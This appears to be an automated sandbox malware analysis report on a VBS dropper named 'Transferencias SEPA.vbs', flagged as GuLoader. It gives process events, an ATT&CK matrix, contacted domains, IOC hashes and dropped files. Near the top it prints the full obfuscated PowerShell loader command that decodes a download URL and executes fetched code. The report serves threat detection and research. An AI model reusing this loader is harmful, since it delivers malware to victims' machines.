'sji p$ pe ign.endlube,rotilkbb beaca,rownlstddm:intragweanlematc,n amtmamaidinencydvgnosteinthrnl.ncedundfleresmelly,fossoniaevikinsdelmol pr,lo seedvmotoresgekrn teame.ddans renv=piptonstnkpeoverfwafvis-overdo da.hbfyrrejstorieheintcmultitenriq tropschec,y ordesekstetna abedrnu
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$undervisningsdisketterne = 1;$strafferammen='substrin';$strafferammen+='g';function toxophilism87($sanerendes){$uneath=$sanerendes.length-$undervisningsdisketterne;for($vacciners=5; $vacciners -lt $uneath; $vacciners+=(6)){$ceylonite+=$sanerendes.$strafferammen.invoke($vacciners, $undervisningsdisketterne);}$ceylonite;}function anthropometry($registrating){& ($bothroi) ($registrating);}$gimmerlams=toxophilism87 'ke nemnovelo tarszebonii nonslmadrelom kiafiske/luffi5,isun. algn0fagbl micon( re lwvejovi.ecannfilmaddockiostudewghi esogre. .rocanreal tuncon s,kke1 pars0gsteh.ublod0,risv; ata m,crow smndicatapnbefly6ext.a4expos;lande laissxkolon6habit4tandb;suppe brndrgloriv sel,: buke1latin2s,eat1baand. col,0overm)cloch vavtogfodboerichec.ellmkwhango,leuk/fo,ok2nim u0fests1.eesf0thema0skrum1marin0ilyas1attr, godffpassainon rrmode.ebromdfaandeomopedxre ri/haand1pht.i2extem1t,lsp.broug0kaske ';$nyttendes=toxophilism87 ' spapudampis.orpuebrugerlabio-phymaakllingwergiekarklnhexadtir,ny ';$fraraadede=toxophilism87 'tentah fientharesttrstepfa,cislenna: guns/fabri/underd underurediimilitvt,ereeassyr.herm ghu oeoox dioflelsghornylrow,iestere.realkc grefo tallmunend/statsuba.saccolle? t.ndepejlix kiefpdovneooutmarnuchatu,ndf=quantdjiliaointerwtalernbjlenl midto tilpa diskdtakof& overislen,delevr=unpro1 reabqhovedl bevildis.erbrand6ekspaccho.diudv,kwhexadfpiperpb,ksedspermugymnolfu.iofhalvfjzucc,ca keruun,huc assap or ag lami8photo-tiemagstemmkoutglytrbesk fyrsitappexufor hoverbbbarflztaktlainddk ';$pjankede=toxophilism87 'grune>trste ';$bothroi=toxophilism87 'unobeicereve alarxbrock ';$perfektibilitet = toxophilism87 'centuefla.kcassonhsceneodil t di.ul%.ianoasubmupmarkoperhvednonira,ndettshutoa acch%r,mod\pr tefc,ntrlqu nod.eaveealderkg lgeatulreg islneb fanrforur.samfuctaxikopreponvarme p.dal& andm&coc f mikretapnecp,eudhsporiodezin frike$ ncon ';anthropometry (toxophilism87 'poka,$aarstgtillglg,bisobrevsbstrigasynsol pal :sannalkulhyi frigqstaalu e,evouniv rjuv.ni vands kjerhskrmt= fors( ablacabr,kmnonredsuper sipun/ svincsanct jaque$,iltrp akemefustirnarkofbludge varmkmiljbtfolleimodstbswerviye.selfab,lilderrtpropie beket,oist)anemo ');anthropometry (toxophilism87 'cst.d$ens,agphenolsensuosyddab b fia,ocialfnull: pranudebitnnarcodf ldmeonsetrshaftv ukorgspitftuntolim rragsangshtolv,e tyr,datomusc,lic1arbej3fo ge4eneba=brunk$stokefneds,rclewkabacksrui,enamaxima recids,oene klipd polyeunsad. ber s pinepre.atl .akoihs patun.es( send$ semip nedsjslagvanonsan steekundune,ochudabse epr.li)amfit ');$fraraadede=$undervgtigheds134[0];anthropometry (toxophilism87 'sji p$ pe ign.endlube,rotilkbb beaca,rownlstddm:intragweanlematc,n amtmamaidinencydvgnosteinthrnl.ncedundfleresmelly,fossoniaevikinsdelmol pr,lo seedvmotoresgekrn teame.ddans renv=piptonstnkpeoverfwafvis-overdo da.hbfyrrejstorieheintcmultitenriq tropschec,y ordesekstetna abedrnuJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting		Valid Accounts11
Command and Scripting Interpreter		221
Scripting		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Transferencias SEPA.vbs21%ReversingLabsScript-WScript.Trojan.Guloader
Transferencias SEPA.vbs14%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
bg.microsoft.map.fastly.net0%VirustotalBrowse
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://go.microsoft.co0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalseunknown
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
217.20.53.35
truefalseunknown
drive.google.com
173.194.219.101
truefalse
    		high
    drive.usercontent.google.com
    		173.194.219.132
    		truefalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://www.google.compowershell.exe, 00000002.00000002.1384995967.0000024901E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDB000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1424642021.00000249101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://drive.usercontent.google.compowershell.exe, 00000002.00000002.1384995967.0000024901DF2000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmptrue
            • URL Reputation: malware
            		unknown
            https://go.microsoft.copowershell.exe, 00000002.00000002.1433043987.000002497604B000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://go.micropowershell.exe, 00000002.00000002.1384995967.00000249012E6000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1424642021.00000249101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://drive.googPpowershell.exe, 00000002.00000002.1384995967.0000024901DB3000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://drive.google.compowershell.exe, 00000002.00000002.1384995967.00000249018B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://drive.usercontent.googhpowershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://drive.usercontent.google.compowershell.exe, 00000002.00000002.1384995967.000002490048D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://drive.google.compowershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.1384995967.0000024900001000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://apis.google.compowershell.exe, 00000002.00000002.1384995967.0000024901E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1384995967.0000024900001000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  173.194.219.101
                                  		drive.google.comUnited States
                                  		15169GOOGLEUSfalse
                                  173.194.219.132
                                  		drive.usercontent.google.comUnited States
                                  		15169GOOGLEUSfalse

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1427936
                                  Start date and time:2024-04-18 11:06:11 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 13s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:17
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:Transferencias SEPA.vbs
                                  Detection:MAL
                                  Classification:mal96.expl.evad.winVBS@6/6@2/2
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 75%
                                  • Number of executed functions: 5
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .vbs

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 217.20.53.35, 23.40.205.34, 23.40.205.26
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                  • Execution Graph export aborted for target powershell.exe, PID 6536 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  11:07:04API Interceptor1x Sleep call for process: wscript.exe modified
                                  11:07:06API Interceptor46x Sleep call for process: powershell.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comhttps://nsjw.newf.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                  • 217.20.51.26
                                  https://i18usgwgwrtjcshghwg.z13.web.core.windows.net/Win08ShDMeEr0887/index.html?phone=%201-844-324-0016Get hashmaliciousTechSupportScamBrowse
                                  • 217.20.48.36
                                  SecuriteInfo.com.PUA.uTorrent.9217.19611.exeGet hashmaliciousUnknownBrowse
                                  • 217.20.51.23
                                  https://wmutqnzfeddd.pages.dev/smart89/Get hashmaliciousTechSupportScamBrowse
                                  • 217.20.51.34
                                  DJWTW8Z47D.exeGet hashmaliciousMars Stealer, VidarBrowse
                                  • 217.20.50.98
                                  https://rts.ccmp.eu/rts/go2.aspx?h=1247107&tp=i-1NGB-Fb-EeO-1jnRvw-1c-PwWY-1c-1j0tsE-l8HoOHKMRi-iIE2M&x=readymoves.com.au/media/Imfs/%23Y2hlcnlsQGltZnMuY29tLmF1Get hashmaliciousUnknownBrowse
                                  • 217.20.51.22
                                  bUAB.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                  • 217.20.63.34
                                  https://netorg5340145-my.sharepoint.com/:b:/g/personal/info_curreg_com/EYsFsgLHWKJPpZNQ4wSBOOoBqo-z__F4rwbyNsnTrr6xBA?e=O3FtTXGet hashmaliciousHTMLPhisherBrowse
                                  • 217.20.50.37
                                  https://ethiocultural.com/choiys/ryosan.co.kr/efax/Get hashmaliciousHTMLPhisherBrowse
                                  • 217.20.54.36
                                  https://domainkey.xxabg.cn/Get hashmaliciousUnknownBrowse
                                  • 217.20.54.37
                                  bg.microsoft.map.fastly.netFACTURA 130424435.vbsGet hashmaliciousUnknownBrowse
                                  • 199.232.210.172
                                  justificant de transfer#U00e8ncia.vbsGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  Justificante de pago.vbsGet hashmaliciousUnknownBrowse
                                  • 199.232.210.172
                                  awb_shipping_documents_17_04_2024_00000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                  • 199.232.214.172
                                  http://185.91.69.110Get hashmaliciousUnknownBrowse
                                  • 199.232.210.172
                                  http://ranchpools.comGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  https://windowdefalerts-error0x21903-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                  • 199.232.210.172
                                  https://windowdefalerts-error0x21908-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                  • 199.232.210.172
                                  https://windowdefalerts-error0x21902-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                  • 199.232.214.172
                                  https://www.applelswlqod.top/all/login.php?idsmt=10123005600&nextfunck=10130550000Get hashmaliciousUnknownBrowse
                                  • 199.232.210.172

                                  ASNs

                                  No context

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0eshipping doc.vbsGet hashmaliciousGuLoaderBrowse
                                  • 173.194.219.101
                                  • 173.194.219.132
                                  FACTURA 130424435.vbsGet hashmaliciousUnknownBrowse
                                  • 173.194.219.101
                                  • 173.194.219.132
                                  justificant de transfer#U00e8ncia.vbsGet hashmaliciousUnknownBrowse
                                  • 173.194.219.101
                                  • 173.194.219.132
                                  Justificante de pago.vbsGet hashmaliciousUnknownBrowse
                                  • 173.194.219.101
                                  • 173.194.219.132
                                  Purchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                  • 173.194.219.101
                                  • 173.194.219.132
                                  Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                  • 173.194.219.101
                                  • 173.194.219.132
                                  p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 173.194.219.101
                                  • 173.194.219.132
                                  SecuriteInfo.com.Variant.MSILHeracles.77820.8707.3938.exeGet hashmaliciousUnknownBrowse
                                  • 173.194.219.101
                                  • 173.194.219.132
                                  SecuriteInfo.com.Win32.PWSX-gen.1728.1300.exeGet hashmaliciousAgentTeslaBrowse
                                  • 173.194.219.101
                                  • 173.194.219.132
                                  SecuriteInfo.com.Heur.15333.25205.exeGet hashmaliciousAgentTeslaBrowse
                                  • 173.194.219.101
                                  • 173.194.219.132

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                  Download File
                                  Process:C:\Windows\System32\wscript.exe
                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                  Category:dropped
                                  Size (bytes):69993
                                  Entropy (8bit):7.99584879649948
                                  Encrypted:true
                                  SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                  MD5:29F65BA8E88C063813CC50A4EA544E93
                                  SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                  SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                  SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                  Download File
                                  Process:C:\Windows\System32\wscript.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):330
                                  Entropy (8bit):3.135003979062184
                                  Encrypted:false
                                  SSDEEP:6:kK3E/lDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:PSlMkPlE99SNxAhUeVLVt
                                  MD5:A110E4BFBCFA4B91C2AF7137882FCFA5
                                  SHA1:956F6B2482AC5FB18EAA705A24C334CF5939754A
                                  SHA-256:AB3F3D924FB1ED97B2DC21519AE71381A6E115AA3F3905E233738FB7E80158C8
                                  SHA-512:FBEB77AFF3834D83C2192FE23EEB4F2843139A1A8D3F419D81C49C297CB53C93E8F96F517E933CEA2377502E9E1F2FB21499BE1E603918ECA95CC24CE55EFDC7
                                  Malicious:false
                                  Reputation:low
                                  Preview:p...... ........>...o...(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):1.1940658735648508
                                  Encrypted:false
                                  SSDEEP:3:Nlllulbnolz:NllUc
                                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:@...e................................................@..........

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nt50uqrg.tml.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgkm3fob.gxz.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Roaming\Fldekager.Con

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                                  Category:dropped
                                  Size (bytes):1692
                                  Entropy (8bit):5.104646886088985
                                  Encrypted:false
                                  SSDEEP:24:hazspnlvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7plmRq+fjsueFYaWJ
                                  MD5:9A09A4CF62F2BFC7F591DC6047CBA450
                                  SHA1:6ADE60A73A796B747BBB377963C7BC1732C79900
                                  SHA-256:307066D2B0DACC5EAC6A183FA96594DE300D8F55A19EA84CBC962943477A325D
                                  SHA-512:248CFF39EA4275F44BA5000DA78CE8E33ADB4C9274F54D611CFAF4C3C68D6A78441E81EA6451C5B918343748592781E9E106BF156FF999EDF4584F657D775E2C
                                  Malicious:false
                                  Reputation:low
